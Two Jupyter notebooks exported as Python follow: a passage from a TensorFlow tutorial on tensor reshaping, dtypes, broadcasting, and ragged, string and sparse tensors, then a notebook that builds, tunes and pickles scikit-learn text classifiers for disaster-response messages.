# + [markdown] colab_type="text" id="J_xRlHZMKYnF"
# You can reshape a tensor into a new shape. Reshaping is fast and cheap as the underlying data does not need to be duplicated.
# + colab={} colab_type="code" id="pa9JCgMLWy87"
# We can reshape a tensor to a new shape.
# Note that we're passing in a list
reshaped = tf.reshape(var_x, [1, 3])
# + colab={} colab_type="code" id="Mcq7iXOkW3LK"
print(var_x.shape)
print(reshaped.shape)
# + [markdown] colab_type="text" id="gIB2tOkoVr6E"
# The data maintains it's layout in memory and a new tensor is created, with the requested shape, pointing to the same data. TensorFlow uses C-style "row-major" memory ordering, where incrementing the right-most index corresponds to a single step in memory.
# + colab={} colab_type="code" id="7kMfM0RpUgI8"
print(rank_3_tensor)
# + [markdown] colab_type="text" id="TcDtfQkJWzIx"
# If you flatten a tensor you can see what order it is laid out in memory.
# + colab={} colab_type="code" id="COnHEPuaWDQp"
# A `-1` passed in the `shape` argument says "Whatever fits".
print(tf.reshape(rank_3_tensor, [-1]))
# + [markdown] colab_type="text" id="jJZRira2W--c"
# Typically the only reasonable uses of `tf.reshape` are to combine or split adjacent axes (or add/remove `1`s).
#
# For this 3x2x5 tensor, reshaping to (3x2)x5 or 3x(2x5) are both reasonable things to do, as the slices do not mix:
# + colab={} colab_type="code" id="zP2Iqc7zWu_J"
print(tf.reshape(rank_3_tensor, [3*2, 5]), "\n")
print(tf.reshape(rank_3_tensor, [3, -1]))
# + [markdown] colab_type="text" id="6ZsZRUhihlDB"
# <table>
# <th colspan=3>
# Some good reshapes.
# </th>
# <tr>
# <td>
# <img src="images/tensor/reshape-before.png" alt="A 3x2x5 tensor">
# </td>
# <td>
# <img src="images/tensor/reshape-good1.png" alt="The same data reshaped to (3x2)x5">
# </td>
# <td>
# <img src="images/tensor/reshape-good2.png" alt="The same data reshaped to 3x(2x5)">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="nOcRxDC3jNIU"
# Reshaping will "work" for any new shape with the same total number of elements, but it will not do anything useful if you do not respect the order of the axes.
#
# Swapping axes in `tf.reshape` does not work, you need `tf.transpose` for that.
#
# + colab={} colab_type="code" id="I9qDL_8u7cBH"
# Bad examples: don't do this
# You can't reorder axes with reshape.
print(tf.reshape(rank_3_tensor, [2, 3, 5]), "\n")
# This is a mess
print(tf.reshape(rank_3_tensor, [5, 6]), "\n")
# This doesn't work at all
try:
tf.reshape(rank_3_tensor, [7, -1])
except Exception as e:
print(f"{type(e).__name__}: {e}")
# + [markdown] colab_type="text" id="qTM9-5eh68oo"
# <table>
# <th colspan=3>
# Some bad reshapes.
# </th>
# <tr>
# <td>
# <img src="images/tensor/reshape-bad.png" alt="You can't reorder axes, use tf.transpose for that">
# </td>
# <td>
# <img src="images/tensor/reshape-bad4.png" alt="Anything that mixes the slices of data together is probably wrong.">
# </td>
# <td>
# <img src="images/tensor/reshape-bad2.png" alt="The new shape must fit exactly.">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="N9r90BvHCbTt"
# You may run across not-fully-specified shapes. Either the shape contains a `None` (a dimension's length is unknown) or the shape is `None` (the rank of the tensor is unknown).
#
# Except for [tf.RaggedTensor](#ragged_tensors), this will only occur in the context of TensorFlow's, symbolic, graph-building APIs:
#
# * [tf.function](function.ipynb)
# * The [keras functional API](keras/functional.ipynb).
#
# + [markdown] colab_type="text" id="fDmFtFM7k0R2"
# ## More on `DTypes`
#
# To inspect a `tf.Tensor`'s data type use the `Tensor.dtype` property.
#
# When creating a `tf.Tensor` from a Python object you may optionally specify the datatype.
#
# If you don't, TensorFlow chooses a datatype that can represent your data. TensorFlow converts Python integers to `tf.int32` and python floating point numbers to `tf.float32`. Otherwise TensorFlow uses the same rules NumPy uses when converting to arrays.
#
# You can cast from type to type.
# + colab={} colab_type="code" id="5mSTDWbelUvu"
the_f64_tensor = tf.constant([2.2, 3.3, 4.4], dtype=tf.float64)
the_f16_tensor = tf.cast(the_f64_tensor, dtype=tf.float16)
# Now, let's cast to an uint8 and lose the decimal precision
the_u8_tensor = tf.cast(the_f16_tensor, dtype=tf.uint8)
print(the_u8_tensor)
# + [markdown] colab_type="text" id="s1yBlJsVlFSu"
# ## Broadcasting
#
# Broadcasting is a concept borrowed from the [equivalent feature in NumPy](https://numpy.org/doc/stable/user/basics.html). In short, under certain conditions, smaller tensors are "stretched" automatically to fit larger tensors when running combined operations on them.
#
# The simplest and most common case is when you attempt to multiply or add a tensor to a scalar. In that case, the scalar is broadcast to be the same shape as the other argument.
# + colab={} colab_type="code" id="P8sypqmagHQN"
x = tf.constant([1, 2, 3])
y = tf.constant(2)
z = tf.constant([2, 2, 2])
# All of these are the same computation
print(tf.multiply(x, 2))
print(x * y)
print(x * z)
# + [markdown] colab_type="text" id="o0SBoR6voWcb"
# Likewise, 1-sized dimensions can be stretched out to match the other arguments. Both arguments can be stretched in the same computation.
#
# In this case a 3x1 matrix is element-wise multiplied by a 1x4 matrix to produce a 3x4 matrix. Note how the leading 1 is optional: The shape of y is `[4]`.
# + colab={} colab_type="code" id="6sGmkPg3XANr"
# These are the same computations
x = tf.reshape(x,[3,1])
y = tf.range(1, 5)
print(x, "\n")
print(y, "\n")
print(tf.multiply(x, y))
# + [markdown] colab_type="text" id="t_7sh-EUYLrE"
# <table>
# <tr>
# <th>A broadcasted add: a <code>[3, 1]</code> times a <code>[1, 4]</code> gives a <code>[3,4]</code> </th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/broadcasting.png" alt="Adding a 3x1 matrix to a 4x1 matrix results in a 3x4 matrix">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="9V3KgSJcKDRz"
# Here is the same operation without broadcasting:
# + colab={} colab_type="code" id="elrF6v63igY8"
x_stretch = tf.constant([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]])
y_stretch = tf.constant([[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4]])
print(x_stretch * y_stretch) # Again, operator overloading
# + [markdown] colab_type="text" id="14KobqYu85gi"
# Most of the time, broadcasting is both time and space efficient, as the broadcast operation never materializes the expanded tensors in memory.
#
# You see what broadcasting looks like using `tf.broadcast_to`.
# + colab={} colab_type="code" id="GW2Q59_r8hZ6"
print(tf.broadcast_to(tf.constant([1, 2, 3]), [3, 3]))
# + [markdown] colab_type="text" id="Z2bAMMQY-jpP"
# Unlike a mathematical op, for example, `broadcast_to` does nothing special to save memory. Here, you are materializing the tensor.
#
# It can get even more complicated. [This section](https://jakevdp.github.io/PythonDataScienceHandbook/02.05-computation-on-arrays-broadcasting.html) of Jake VanderPlas's book _Python Data Science Handbook_ shows more broadcasting tricks (again in NumPy).
# + [markdown] colab_type="text" id="o4Rpz0xAsKSI"
# ## tf.convert_to_tensor
#
# Most ops, like `tf.matmul` and `tf.reshape` take arguments of class `tf.Tensor`. However, you'll notice in the above case, we frequently pass Python objects shaped like tensors.
#
# Most, but not all, ops call `convert_to_tensor` on non-tensor arguments. There is a registry of conversions, and most object classes like NumPy's `ndarray`, `TensorShape`, Python lists, and `tf.Variable` will all convert automatically.
#
# See `tf.register_tensor_conversion_function` for more details, and if you have your own type you'd like to automatically convert to a tensor.
# + [markdown] colab_type="text" id="05bBVBVYV0y6"
# ## Ragged Tensors
#
# A tensor with variable numbers of elements along some axis is called "ragged". Use `tf.ragged.RaggedTensor` for ragged data.
#
# For example, This cannot be represented as a regular tensor:
# + [markdown] colab_type="text" id="VPc3jGoeJqB7"
# <table>
# <tr>
# <th>A `tf.RaggedTensor`, shape: <code>[4, None]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/ragged.png" alt="A 2-axis ragged tensor, each row can have a different length.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="VsbTjoFfNVBF"
ragged_list = [
[0, 1, 2, 3],
[4, 5],
[6, 7, 8],
[9]]
# + colab={} colab_type="code" id="p4xKTo57tutG"
try:
tensor = tf.constant(ragged_list)
except Exception as e:
print(f"{type(e).__name__}: {e}")
# + [markdown] colab_type="text" id="0cm9KuEeMLGI"
# Instead create a `tf.RaggedTensor` using `tf.ragged.constant`:
# + colab={} colab_type="code" id="XhF3QV3jiqTj"
ragged_tensor = tf.ragged.constant(ragged_list)
print(ragged_tensor)
# + [markdown] colab_type="text" id="sFgHduHVNoIE"
# The shape of a `tf.RaggedTensor` contains unknown dimensions:
# + colab={} colab_type="code" id="Eo_3wJUWNgqB"
print(ragged_tensor.shape)
# + [markdown] colab_type="text" id="V9njclVkkN7G"
# ## String tensors
#
# `tf.string` is a `dtype`, which is to say we can represent data as strings (variable-length byte arrays) in tensors.
#
# The strings are atomic and cannot be indexed the way Python strings are. The length of the string is not one of the dimensions of the tensor. See `tf.strings` for functions to manipulate them.
# + [markdown] colab_type="text" id="5P_8spEGQ0wp"
# Here is a scalar string tensor:
# + colab={} colab_type="code" id="sBosmM8MkIh4"
# Tensors can be strings, too here is a scalar string.
scalar_string_tensor = tf.constant("Gray wolf")
print(scalar_string_tensor)
# + [markdown] colab_type="text" id="CMFBSl1FQ3vE"
# And a vector of strings:
# + [markdown] colab_type="text" id="IO-c3Tq3RC1L"
# <table>
# <tr>
# <th>A vector of strings, shape: <code>[3,]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/strings.png" alt="The string length is not one of the tensor's axes.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="41Dv2kL9QrtO"
# If we have three string tensors of different lengths, this is OK.
tensor_of_strings = tf.constant(["Gray wolf",
"Quick brown fox",
"Lazy dog"])
# Note that the shape is (3,). The string length is not included.
print(tensor_of_strings)
# + [markdown] colab_type="text" id="76gQ9qrgSMzS"
# In the above printout the `b` prefix indicates that `tf.string` dtype is not a unicode string, but a byte-string. See the [Unicode Tutorial](https://www.tensorflow.org/tutorials/load_data/unicode) for more about working with unicode text in TensorFlow.
# -
# If we have three string tensors of different lengths, this is OK.
tensor_of_strings = tf.constant([u"今天天气不错",
"挺风和日丽的",
"我们下午没有课"])
# Note that the shape is (3,). The string length is not included.
print(tensor_of_strings[1:])
tf.print(tensor_of_strings[1])
# + [markdown] colab_type="text" id="ClSBPK-lZBQp"
# If you pass unicode characters they are utf-8 encoded.
# + colab={} colab_type="code" id="GTgL53jxSMd9"
tf.constant("🥳👍")
# + [markdown] colab_type="text" id="Ir9cY42MMAei"
# Some basic functions with strings can be found in `tf.strings`, including `tf.strings.split`.
# + colab={} colab_type="code" id="8k2K0VTFyj8e"
# We can use split to split a string into a set of tensors
print(tf.strings.split(scalar_string_tensor, sep=" "))
# + colab={} colab_type="code" id="zgGAn1dfR-04"
# ...but it turns into a `RaggedTensor` if we split up a tensor of strings,
# as each string might be split into a different number of parts.
print(tf.strings.split(tensor_of_strings))
# + [markdown] colab_type="text" id="HsAn1kPeO84m"
# <table>
# <tr>
# <th>Three strings split, shape: <code>[3, None]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/string-split.png" alt="Splitting multiple strings returns a tf.RaggedTensor">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="st9OxrUxWSKY"
# And `tf.string.to_number`:
# + colab={} colab_type="code" id="3nRtx3X9WRfN"
text = tf.constant("1 10 100")
print(tf.strings.to_number(tf.strings.split(text, " ")))
# + [markdown] colab_type="text" id="r2EZtBbJBns4"
# Although you can't use `tf.cast` to turn a string tensor into numbers, you can convert it into bytes, and then into numbers.
# + colab={} colab_type="code" id="fo8BjmH7gyTj"
byte_strings = tf.strings.bytes_split(tf.constant("Duck"))
byte_ints = tf.io.decode_raw(tf.constant("Duck"), tf.uint8)
print("Byte strings:", byte_strings)
print("Bytes:", byte_ints)
# + colab={} colab_type="code" id="uSQnZ7d1jCSQ"
# Or split it up as unicode and then decode it
unicode_bytes = tf.constant("アヒル 🦆")
unicode_char_bytes = tf.strings.unicode_split(unicode_bytes, "UTF-8")
unicode_values = tf.strings.unicode_decode(unicode_bytes, "UTF-8")
print("\nUnicode bytes:", unicode_bytes)
print("\nUnicode chars:", unicode_char_bytes)
print("\nUnicode values:", unicode_values)
# + [markdown] colab_type="text" id="fE7nKJ2YW3aY"
# The `tf.string` dtype is used for all raw bytes data in TensorFlow. The `tf.io` module contains functions for converting data to and from bytes, including decoding images and parsing csv.
# + [markdown] colab_type="text" id="ua8BnAzxkRKV"
# ## Sparse tensors
#
# Sometimes, your data is sparse, like a very wide embedding space. TensorFlow supports `tf.sparse.SparseTensor` and related operations to store sparse data efficiently.
# + [markdown] colab_type="text" id="mS5zgqgUTPRb"
# <table>
# <tr>
# <th>A `tf.SparseTensor`, shape: <code>[3, 4]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/sparse.png" alt="An 3x4 grid, with values in only two of the cells.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="B9nbO1E2kSUN"
# Sparse tensors store values by index in a memory-efficient manner
sparse_tensor = tf.sparse.SparseTensor(indices=[[0, 0], [1, 2]],
values=[1, 2],
dense_shape=[3, 4])
print(sparse_tensor, "\n")
# We can convert sparse tensors to dense
print(tf.sparse.to_dense(sparse_tensor))
|
src/Basic_knowledge/learn_TensorFlow2.0/tensor.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # ML Pipeline Preparation
# Follow the instructions below to help you create your ML pipeline.
# ### 1. Import libraries and load data from database.
# - Import Python libraries
# - Load dataset from database with [`read_sql_table`](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql_table.html)
# - Define feature and target variables X and Y
# import libraries
import pandas as pd
import numpy as np
import pickle
from sqlalchemy import create_engine
import warnings
warnings.filterwarnings("ignore")
# import NLP libraries
import re
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
# nltk.download('punkt')
# nltk.download('stopwords')
# nltk.download('wordnet') # download for lemmatization
# import sklearn
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.multioutput import MultiOutputClassifier
from sklearn.metrics import precision_score, recall_score, f1_score
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
# load data from database
engine = create_engine('sqlite:///data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponse', engine)
X = df['message']
Y = df.drop(['id', 'message', 'original', 'genre'], axis=1)
# ### 2. Write a tokenization function to process your text data
def tokenize(text):
# Define url pattern
url_re = 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
# Detect and replace urls
detected_urls = re.findall(url_re, text)
for url in detected_urls:
text = text.replace(url, "urlplaceholder")
# tokenize sentences
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
# save cleaned tokens
clean_tokens = [lemmatizer.lemmatize(tok).lower().strip() for tok in tokens]
# remove stopwords
STOPWORDS = list(set(stopwords.words('english')))
clean_tokens = [token for token in clean_tokens if token not in STOPWORDS]
return clean_tokens
# ### 3. Build a machine learning pipeline
# - You'll find the [MultiOutputClassifier](http://scikit-learn.org/stable/modules/generated/sklearn.multioutput.MultiOutputClassifier.html) helpful for predicting multiple target variables.
def build_pipeline():
# build NLP pipeline - count words, tf-idf, multiple output classifier
pipeline = Pipeline([
('vec', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(RandomForestClassifier(n_estimators = 100, n_jobs = 6)))
])
return pipeline
# ### 4. Train pipeline
# - Split data into train and test sets
# - Train pipeline
X_train, X_test, y_train, y_test = train_test_split(X, Y)
pipeline = build_pipeline()
pipeline.fit(X_train, y_train)
# ### 5. Test your model
# Report the f1 score, precision and recall for each output category of the dataset. You can do this by iterating through the columns and calling sklearn's `classification_report` on each.
def build_report(pipeline, X_test, y_test):
# predict on the X_test
y_pred = pipeline.predict(X_test)
# build classification report on every column
performances = []
for i in range(len(y_test.columns)):
performances.append([f1_score(y_test.iloc[:, i].values, y_pred[:, i], average='micro'),
precision_score(y_test.iloc[:, i].values, y_pred[:, i], average='micro'),
recall_score(y_test.iloc[:, i].values, y_pred[:, i], average='micro')])
# build dataframe
performances = pd.DataFrame(performances, columns=['f1 score', 'precision', 'recall'],
index = y_test.columns)
return performances
build_report(pipeline, X_test, y_test)
# ### 6. Improve your model
# Use grid search to find better parameters.
# +
parameters = {'clf__estimator__max_features':['sqrt', 0.5],
'clf__estimator__n_estimators':[50, 100]}
cv = GridSearchCV(estimator=pipeline, param_grid = parameters, cv = 5, n_jobs = 6)
cv.fit(X_train, y_train)
# -
# ### 7. Test your model
# Show the accuracy, precision, and recall of the tuned model.
#
# Since this project focuses on code quality, process, and pipelines, there is no minimum performance metric needed to pass. However, make sure to fine tune your models for accuracy, precision and recall to make your project stand out - especially for your portfolio!
build_report(cv, X_test, y_test)
cv.best_params_
# ### 8. Try improving your model further. Here are a few ideas:
# * try other machine learning algorithms
# * add other features besides the TF-IDF
pipeline_improved = Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer()),
('clf', MultiOutputClassifier(AdaBoostClassifier(n_estimators = 100)))
])
pipeline_improved.fit(X_train, y_train)
y_pred_improved = pipeline_improved.predict(X_test)
build_report(pipeline_improved, X_test, y_test)
# ### 9. Export your model as a pickle file
pickle.dump(pipeline, open('rf_model.pkl', 'wb'))
pickle.dump(pipeline_improved, open('adaboost_model.pkl', 'wb'))
# ### 10. Use this notebook to complete `train.py`
# Use the template file attached in the Resources folder to write a script that runs the steps above to create a database and export a model based on a new dataset specified by the user.
|
Project 5 - Disaster Response Pipeline/ML Pipeline Preparation.ipynb
|